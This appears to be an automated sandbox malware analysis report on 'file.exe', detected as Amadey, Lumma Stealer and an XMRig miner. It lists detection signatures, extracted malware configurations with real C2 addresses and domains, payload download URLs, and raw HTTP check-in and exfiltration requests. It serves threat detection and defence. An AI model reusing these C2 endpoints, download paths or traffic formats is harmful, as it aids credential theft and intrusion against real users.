Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1579277
MD5: 76c2f75bf3efb5964c432f7661d22d58
SHA1: 521badd0c5d9f85986a7845b3163b82b87c0589d
SHA256: 939310706200640f603a1fb3e6528c3a4bafa87e0d610e817a7824cf2e089bc7
Tags: exe, user-Bitsight

Detection

LummaC, Amadey, LummaC Stealer, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to start a terminal service
Creates files in the system32 config directory
Drops password protected ZIP file
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Found strings related to Crypto-Mining
Hides threads from debuggers
Injects code into the Windows Explorer (explorer.exe)
Leaks process information
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name | Description | Attribution | Blogpost URLs | Link
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Amadey | Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

AV Detection

Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe Avira: detection malicious, Label: HEUR/AGEN.1352802
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Avira: detection malicious, Label: HEUR/AGEN.1352802
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000005.00000002.2930996247.0000000000151000.00000040.00000001.01000000.00000007.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0000002C.00000002.2937965345.00000000013C8000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: LummaC {"C2 url": ["treehoneyi.click", "energyaffai.lat", "sustainskelet.lat", "discokeyus.lat", "grannyejh.lat", "rapeflowwj.lat", "crosshuaht.lat", "aspecteirs.lat", "necklacebudi.lat"], "Build id": "rAGxSF--load"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe ReversingLabs: Detection: 69%
Source: file.exe Virustotal: Detection: 55%
Source: file.exe ReversingLabs: Detection: 55%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_d38828e7-d

Bitcoin Miner

Source: Yara match File source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 47.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000002.2529597968.0000000001319000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2529597968.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2530687816.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.2881532847.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.2881532847.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2530936090.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.2882244663.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.2881532847.0000000000714000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.2882428177.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000003.2876108637.00000202AA9D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 8088, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 8060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 6248, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 6284, type: MEMORYSTR
Source: Intel_PTT_EK_Recertification.exe, 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Source: Intel_PTT_EK_Recertification.exe, 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: cryptonight/0
Source: Intel_PTT_EK_Recertification.exe, 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: -o, --url=URL URL of mining server
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Google\Chrome\Extensions
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\graph
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\graph\graph.exe
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49825 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49867 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49872 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49879 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49880 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49888 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.91.209:443 -> 192.168.2.4:49925 version: TLS 1.2
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: 4115805b10.exe, 00000027.00000000.2649047959.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000027.00000002.2797453206.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000002.2820458214.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: skotes.exe, 00000005.00000002.2942570852.0000000000DEA000.00000004.00000020.00020000.00000000.sdmp, 322c3dce5b.exe, 00000033.00000000.2907742348.0000000000032000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: 4115805b10.exe, 00000027.00000003.2754575088.00000268125C2000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000029.00000000.2754980065.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 00000029.00000002.2936121844.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002B.00000002.2935569861.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002B.00000000.2777839944.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000000.2854750206.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000002.2936047599.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: number of queries: 1001
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime, 6_2_0040367D
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z, 6_2_004031DC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C87978 FindFirstFileW,FindFirstFileW,free, 10_2_00C87978
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C8881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free, 10_2_00C8881C
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\main\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\main\extracted

Networking

Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49748 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49754
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49804 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49822 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49849 -> 212.193.31.8:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49843 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.4:49786 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49868 -> 212.193.31.8:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49886 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49889 -> 212.193.31.8:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49911 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49908 -> 212.193.31.8:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49926 -> 212.193.31.8:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49930 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49842 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49867 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49805 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49805 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49810 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49810 -> 104.21.67.146:443
Source: Malware configuration extractor URLs: treehoneyi.click
Source: Malware configuration extractor URLs: energyaffai.lat
Source: Malware configuration extractor URLs: sustainskelet.lat
Source: Malware configuration extractor URLs: discokeyus.lat
Source: Malware configuration extractor URLs: grannyejh.lat
Source: Malware configuration extractor URLs: rapeflowwj.lat
Source: Malware configuration extractor URLs: crosshuaht.lat
Source: Malware configuration extractor URLs: aspecteirs.lat
Source: Malware configuration extractor URLs: necklacebudi.lat
Source: Malware configuration extractor IPs: 185.215.113.43
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: unknown DNS query: name: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 11:15:10 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 11:15:22 GMTContent-Type: application/octet-streamContent-Length: 1861632Last-Modified: Thu, 19 Dec 2024 20:35:58 GMTConnection: keep-aliveETag: "676483ae-1c6800"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 11:15:30 GMTContent-Type: application/octet-streamContent-Length: 439296Last-Modified: Sat, 21 Dec 2024 08:14:10 GMTConnection: keep-aliveETag: "676678d2-6b400"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 11:15:37 GMTContent-Type: application/octet-streamContent-Length: 605696Last-Modified: Thu, 12 Dec 2024 15:01:10 GMTConnection: keep-aliveETag: "675afab6-93e00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 11:15:43 GMTContent-Type: application/octet-streamContent-Length: 4468736Last-Modified: Sat, 21 Dec 2024 11:08:34 GMTConnection: keep-aliveETag: "6766a1b2-443000"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 11:15:56 GMTContent-Type: application/octet-streamContent-Length: 1374720Last-Modified: Thu, 19 Dec 2024 17:14:58 GMTConnection: keep-aliveETag: "67645492-14fa00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 11:16:03 GMTContent-Type: application/octet-streamContent-Length: 22016Last-Modified: Thu, 19 Dec 2024 14:25:14 GMTConnection: keep-aliveETag: "67642cca-5600"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 41 32 42 37 31 42 32 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7ABA2B71B25F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 31 39 33 31 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1019315001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/geopoxid/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 33 31 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019316001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/zhigarko/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 33 31 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019317001&unit=246122658369
